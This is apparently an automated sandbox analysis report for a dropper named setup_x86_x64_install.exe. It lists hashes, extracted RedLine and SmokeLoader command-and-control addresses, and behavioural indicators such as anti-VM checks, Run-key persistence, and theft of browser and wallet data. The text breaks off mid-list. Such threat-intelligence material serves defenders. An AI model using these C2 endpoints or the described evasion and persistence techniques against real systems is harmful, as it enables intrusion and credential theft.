Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
8setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
05-10-2021 16:27
211005-tx24csaah9 1004-10-2021 16:37
211004-t43cpsgfe7 1004-10-2021 07:39
211004-jhgtrsfhf8 1003-10-2021 18:09
211003-wryvvsffgk 1002-10-2021 23:31
211002-3hwsgaehhl 1002-10-2021 06:10
211002-gxfh5sdgg7 1001-10-2021 13:44
211001-q16deabhek 10Analysis
-
max time kernel
1803s -
max time network
1794s -
platform
windows11_x64 -
resource
win11 -
submitted
04-10-2021 16:37
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
6.4MB
-
MD5
c6e46aa3d6424b03e0a4ccb193d3eade
-
SHA1
c8b49055743fa7b4d6a982aea26efb627bb1f2e1
-
SHA256
5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156
-
SHA512
06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Extracted
smokeloader
2020
http://fiskahlilian16.top/
http://paishancho17.top/
http://ydiannetter18.top/
http://azarehanelle19.top/
http://quericeriant20.top/
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6124 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7400 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8212 4884 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5696-294-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/5696-293-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10720d229511df563.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10720d229511df563.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 29 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeforfiles.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.exemsedge.exepowershell.exeWerFault.exedescription pid process target process PID 5736 created 5732 5736 WerFault.exe mshta.exe PID 1472 created 5404 1472 WerFault.exe Conhost.exe PID 4688 created 5148 4688 WerFault.exe Fri10720d229511df563.exe PID 7112 created 4736 7112 forfiles.exe Fri1015b9a4e0b.exe PID 784 created 6544 784 WerFault.exe rundll32.exe PID 2120 created 5280 2120 WerFault.exe Fri10acd1e0a9e6.exe PID 5608 created 5732 5608 WerFault.exe mshta.exe PID 6408 created 5732 6408 WerFault.exe mshta.exe PID 6640 created 6288 6640 WerFault.exe VQgrNhc4WsP27ikp84942S7c.exe PID 5592 created 2340 5592 WerFault.exe Firstoffer.exe PID 2992 created 6304 2992 WerFault.exe 1U7rz2B7WbSFlXtvDg8Z5IbN.exe PID 1340 created 5732 1340 WerFault.exe mshta.exe PID 5220 created 6512 5220 WerFault.exe ZwD24QUjPt3CXwW27xWlqIZe.exe PID 7136 created 6544 7136 WerFault.exe rundll32.exe PID 4764 created 1104 4764 setup.exe PID 5856 created 6200 5856 WerFault.exe Fri105268dda3.exe PID 7064 created 6380 7064 WerFault.exe uqqAcKDbb5l4Gg0p81LTojnE.exe PID 3680 created 5732 3680 WerFault.exe mshta.exe PID 6864 created 5732 6864 WerFault.exe mshta.exe PID 6560 created 6372 6560 WerFault.exe cmd.exe PID 4976 created 5540 4976 WerFault.exe Conhost.exe PID 3680 created 6340 3680 WerFault.exe PlREWOPKJ6dQLCAu2xyyr7tT.exe PID 5088 created 6720 5088 WerFault.exe cust2.exe PID 3760 created 7084 3760 WerFault.exe 6AF7.exe PID 6908 created 7420 6908 WerFault.exe rundll32.exe PID 7756 created 7508 7756 rundll32.exe E411.exe PID 9536 created 7340 9536 msedge.exe 2274.exe PID 8304 created 8248 8304 powershell.exe rundll32.exe PID 13908 created 13792 13908 WerFault.exe RegAsm.exe -
Arkei Stealer Payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/6396-509-0x0000000000400000-0x0000000004A15000-memory.dmp family_arkei -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral4/memory/2340-546-0x00000000008C0000-0x0000000000994000-memory.dmp family_vidar behavioral4/memory/6304-555-0x00000000008A0000-0x0000000000976000-memory.dmp family_vidar behavioral4/memory/6512-562-0x0000000000820000-0x00000000008F4000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 43 IoCs
Processes:
cmd.exepowershell.exeMsiExec.exeflow pid process 108 836 cmd.exe 556 7564 powershell.exe 568 7564 powershell.exe 780 16132 MsiExec.exe 784 16132 MsiExec.exe 786 16132 MsiExec.exe 789 16132 MsiExec.exe 792 16132 MsiExec.exe 796 16132 MsiExec.exe 798 16132 MsiExec.exe 800 16132 MsiExec.exe 805 16132 MsiExec.exe 810 16132 MsiExec.exe 814 16132 MsiExec.exe 817 16132 MsiExec.exe 821 16132 MsiExec.exe 823 16132 MsiExec.exe 826 16132 MsiExec.exe 833 16132 MsiExec.exe 834 16132 MsiExec.exe 836 16132 MsiExec.exe 840 16132 MsiExec.exe 846 16132 MsiExec.exe 848 16132 MsiExec.exe 850 16132 MsiExec.exe 857 16132 MsiExec.exe 862 16132 MsiExec.exe 869 16132 MsiExec.exe 870 16132 MsiExec.exe 800 16132 MsiExec.exe 877 16132 MsiExec.exe 880 16132 MsiExec.exe 888 16132 MsiExec.exe 890 16132 MsiExec.exe 894 16132 MsiExec.exe 898 16132 MsiExec.exe 902 16132 MsiExec.exe 905 16132 MsiExec.exe 906 16132 MsiExec.exe 908 16132 MsiExec.exe 916 16132 MsiExec.exe 918 16132 MsiExec.exe 922 16132 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Sayma.exeAdam.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Sayma.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Adam.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeFri10584c049c7f.exeFri1034cd265b5e0adcd.exeFri1008c7d6874.exeFri1015b9a4e0b.exeFri10b0a06a73706.exeFri103a7805577.exeFri106e757f6d75.exeFri10fcc13ae0125c8.exeFri1018ef4aa251c026c.exeFri10d184202996a0d7f.exeFri10720d229511df563.exeFri10fcc13ae0125c8.tmpFri10acd1e0a9e6.exeSayma.exe1223505.scrWerFault.exe8752590.scrZ_V3sMNGsvI7rRpfvw0QMyp6.exeFri106e757f6d75.exerundll32.exeSkVPVS3t6Y8W.EXeDownFlSetup110.exeinst001.exe1258873.scrFirstoffer.exemshta.exe4051319.scrsetup.execmd.exeWinHoster.exesfx_123_206.exe7375211.scr5865939.scrFri105268dda3.exeVQgrNhc4WsP27ikp84942S7c.exe1U7rz2B7WbSFlXtvDg8Z5IbN.exesetup_2.exesvchost.exemz3j1eZvlG3xLyLgnJGzG2iz.exeuqqAcKDbb5l4Gg0p81LTojnE.exeoRwRi1GBtOt2bWpZEv9NvTbH.execmd.exeCYhWK6wGUBr_0KUI2pFoRj1Q.exeWerFault.exeaZ0YnrKtc10UIUgYsMgrAuZt.exeICL5tqbRIE9gecc0WfBQzYV0.exe6h7TGlpVEfKxMzs0E3XQolaC.exee3pqPskkJwLs8LEChQJEssCE.exemshta.exeZwD24QUjPt3CXwW27xWlqIZe.exeZnOJUZYeiLcgg2qi3EKdqjT5.exepd0GmSfuZ2V71wU_KPGmGqbl.exerundll32.exe3144856.scrsetup_2.tmpjhuuee.exe1696741.scrsetup_2.execmd.execm3.exeCJeRWlxNdVxvx5eZGzAWYfVu.exeinst002.exepid process 4152 setup_installer.exe 4164 setup_install.exe 4752 Fri10584c049c7f.exe 1320 Fri1034cd265b5e0adcd.exe 3804 Fri1008c7d6874.exe 4736 Fri1015b9a4e0b.exe 3564 Fri10b0a06a73706.exe 4628 Fri103a7805577.exe 4648 Fri106e757f6d75.exe 4704 Fri10fcc13ae0125c8.exe 4624 Fri1018ef4aa251c026c.exe 5000 Fri10d184202996a0d7f.exe 5148 Fri10720d229511df563.exe 5228 Fri10fcc13ae0125c8.tmp 5280 Fri10acd1e0a9e6.exe 5792 Sayma.exe 5816 1223505.scr 5856 WerFault.exe 5944 8752590.scr 6020 Z_V3sMNGsvI7rRpfvw0QMyp6.exe 5696 Fri106e757f6d75.exe 6124 rundll32.exe 6140 SkVPVS3t6Y8W.EXe 3840 DownFlSetup110.exe 4388 inst001.exe 5356 1258873.scr 2340 Firstoffer.exe 5732 mshta.exe 4140 4051319.scr 1104 setup.exe 5692 cmd.exe 4072 WinHoster.exe 4628 sfx_123_206.exe 5304 7375211.scr 4176 5865939.scr 6200 Fri105268dda3.exe 6288 VQgrNhc4WsP27ikp84942S7c.exe 6304 1U7rz2B7WbSFlXtvDg8Z5IbN.exe 6256 setup_2.exe 6336 svchost.exe 6348 mz3j1eZvlG3xLyLgnJGzG2iz.exe 6380 uqqAcKDbb5l4Gg0p81LTojnE.exe 6364 oRwRi1GBtOt2bWpZEv9NvTbH.exe 6372 cmd.exe 6396 CYhWK6wGUBr_0KUI2pFoRj1Q.exe 6408 WerFault.exe 6416 aZ0YnrKtc10UIUgYsMgrAuZt.exe 6472 ICL5tqbRIE9gecc0WfBQzYV0.exe 6480 6h7TGlpVEfKxMzs0E3XQolaC.exe 6488 e3pqPskkJwLs8LEChQJEssCE.exe 6504 mshta.exe 6512 ZwD24QUjPt3CXwW27xWlqIZe.exe 6520 ZnOJUZYeiLcgg2qi3EKdqjT5.exe 6528 pd0GmSfuZ2V71wU_KPGmGqbl.exe 6544 rundll32.exe 6684 3144856.scr 6808 setup_2.tmp 6948 jhuuee.exe 6856 1696741.scr 564 setup_2.exe 836 cmd.exe 1812 cm3.exe 2936 CJeRWlxNdVxvx5eZGzAWYfVu.exe 5768 inst002.exe -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exe3027623.scrFri10d184202996a0d7f.exemz3j1eZvlG3xLyLgnJGzG2iz.exe4051319.scr1361734.scrInstall.exesvchost.exe7424173.scr4726559.scr1258873.scr8926187.scr8FD5.exe6h7TGlpVEfKxMzs0E3XQolaC.exeZnOJUZYeiLcgg2qi3EKdqjT5.exe8280124.scrdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3027623.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mz3j1eZvlG3xLyLgnJGzG2iz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mz3j1eZvlG3xLyLgnJGzG2iz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4051319.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1361734.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7424173.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4726559.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3027623.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1361734.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1258873.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4051319.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8926187.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8FD5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6h7TGlpVEfKxMzs0E3XQolaC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZnOJUZYeiLcgg2qi3EKdqjT5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZnOJUZYeiLcgg2qi3EKdqjT5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8280124.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6h7TGlpVEfKxMzs0E3XQolaC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7424173.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1258873.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4726559.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8280124.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8926187.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8FD5.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeFri10fcc13ae0125c8.tmpConhost.exesetup_2.tmpsetup_2.tmp7375211.scrLzmwAqmV.exeCYhWK6wGUBr_0KUI2pFoRj1Q.exerundll32.exerundll32.exerundll32.exeoRwRi1GBtOt2bWpZEv9NvTbH.tmprundll32.exerundll32.exerundll32.exeinstaller.exerundll32.exerundll32.exerundll32.exeMsiExec.exerundll32.exeMsiExec.exeautosubplayer.exeautosubplayer.exepid process 4164 setup_install.exe 4164 setup_install.exe 4164 setup_install.exe 4164 setup_install.exe 4164 setup_install.exe 4164 setup_install.exe 5228 Fri10fcc13ae0125c8.tmp 5404 Conhost.exe 6808 setup_2.tmp 4644 setup_2.tmp 5304 7375211.scr 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 3352 LzmwAqmV.exe 6396 CYhWK6wGUBr_0KUI2pFoRj1Q.exe 6544 rundll32.exe 5304 7375211.scr 5304 7375211.scr 6028 rundll32.exe 6760 rundll32.exe 4524 oRwRi1GBtOt2bWpZEv9NvTbH.tmp 4796 rundll32.exe 6740 rundll32.exe 5960 rundll32.exe 2452 installer.exe 2452 installer.exe 3016 rundll32.exe 3016 rundll32.exe 7968 rundll32.exe 2452 installer.exe 7420 rundll32.exe 5640 MsiExec.exe 5640 MsiExec.exe 15904 rundll32.exe 16132 MsiExec.exe 7684 autosubplayer.exe 16132 MsiExec.exe 16132 MsiExec.exe 16132 MsiExec.exe 16132 MsiExec.exe 16132 MsiExec.exe 16132 MsiExec.exe 4356 autosubplayer.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10d184202996a0d7f.exe themida C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10d184202996a0d7f.exe themida behavioral4/memory/5000-253-0x0000000000F70000-0x0000000000F71000-memory.dmp themida C:\Users\Admin\AppData\Roaming\1258873.scr themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
Sayma.exeAdam.exemsedge.exe8752590.scrdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Senanebekae.exe\"" Sayma.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\PowerControl\\Maqovolycu.exe\"" Adam.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8752590.scr -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
7424173.scr8FD5.exe1258873.scr6h7TGlpVEfKxMzs0E3XQolaC.exemz3j1eZvlG3xLyLgnJGzG2iz.exe4726559.scr3027623.scr1361734.scr8280124.scr8926187.scrFri10d184202996a0d7f.exe4051319.scrZnOJUZYeiLcgg2qi3EKdqjT5.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7424173.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8FD5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1258873.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6h7TGlpVEfKxMzs0E3XQolaC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mz3j1eZvlG3xLyLgnJGzG2iz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4726559.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3027623.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1361734.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8280124.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8926187.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4051319.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZnOJUZYeiLcgg2qi3EKdqjT5.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exeInstall.exedescription ioc process File opened (read-only) \??\B: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\J: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ipinfo.io 13 ip-api.com 13 ipinfo.io 21 ipinfo.io 110 ipinfo.io 143 ipinfo.io 253 ip-api.com -
Drops file in System32 directory 10 IoCs
Processes:
rundll32.exerundll32.exeInstall.exeInstall.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
Fri10d184202996a0d7f.exe1258873.scr4051319.scrmz3j1eZvlG3xLyLgnJGzG2iz.exe6h7TGlpVEfKxMzs0E3XQolaC.exeZnOJUZYeiLcgg2qi3EKdqjT5.exe4726559.scr7424173.scr3027623.scr1361734.scr8280124.scr8926187.scr8FD5.exepid process 5000 Fri10d184202996a0d7f.exe 5356 1258873.scr 4140 4051319.scr 6348 mz3j1eZvlG3xLyLgnJGzG2iz.exe 6480 6h7TGlpVEfKxMzs0E3XQolaC.exe 6520 ZnOJUZYeiLcgg2qi3EKdqjT5.exe 6820 4726559.scr 2188 7424173.scr 6040 3027623.scr 840 1361734.scr 5860 8280124.scr 6392 8926187.scr 6444 8FD5.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
Fri106e757f6d75.exee3pqPskkJwLs8LEChQJEssCE.exesvchost.exeservices64.exe34C3.exeConhost.exeIfZhM4uqhiGPN0yi98muF9eW.exetmpAB0B_tmp.exeF8D2.exedescription pid process target process PID 4648 set thread context of 5696 4648 Fri106e757f6d75.exe Fri106e757f6d75.exe PID 6488 set thread context of 1688 6488 e3pqPskkJwLs8LEChQJEssCE.exe e3pqPskkJwLs8LEChQJEssCE.exe PID 6336 set thread context of 6196 6336 svchost.exe RegSvcs.exe PID 492 set thread context of 2176 492 services64.exe explorer.exe PID 6716 set thread context of 5388 6716 34C3.exe 34C3.exe PID 6344 set thread context of 3960 6344 Conhost.exe 2987.exe PID 6180 set thread context of 2600 6180 IfZhM4uqhiGPN0yi98muF9eW.exe IfZhM4uqhiGPN0yi98muF9eW.exe PID 5508 set thread context of 8036 5508 tmpAB0B_tmp.exe tmpAB0B_tmp.exe PID 8132 set thread context of 13792 8132 F8D2.exe RegAsm.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exeWerFault.exepowershell.exedata_load.exeultramediaburner.tmpSayma.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe WerFault.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\SMBbvCSuKLI powershell.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac autosubplayer.exe File 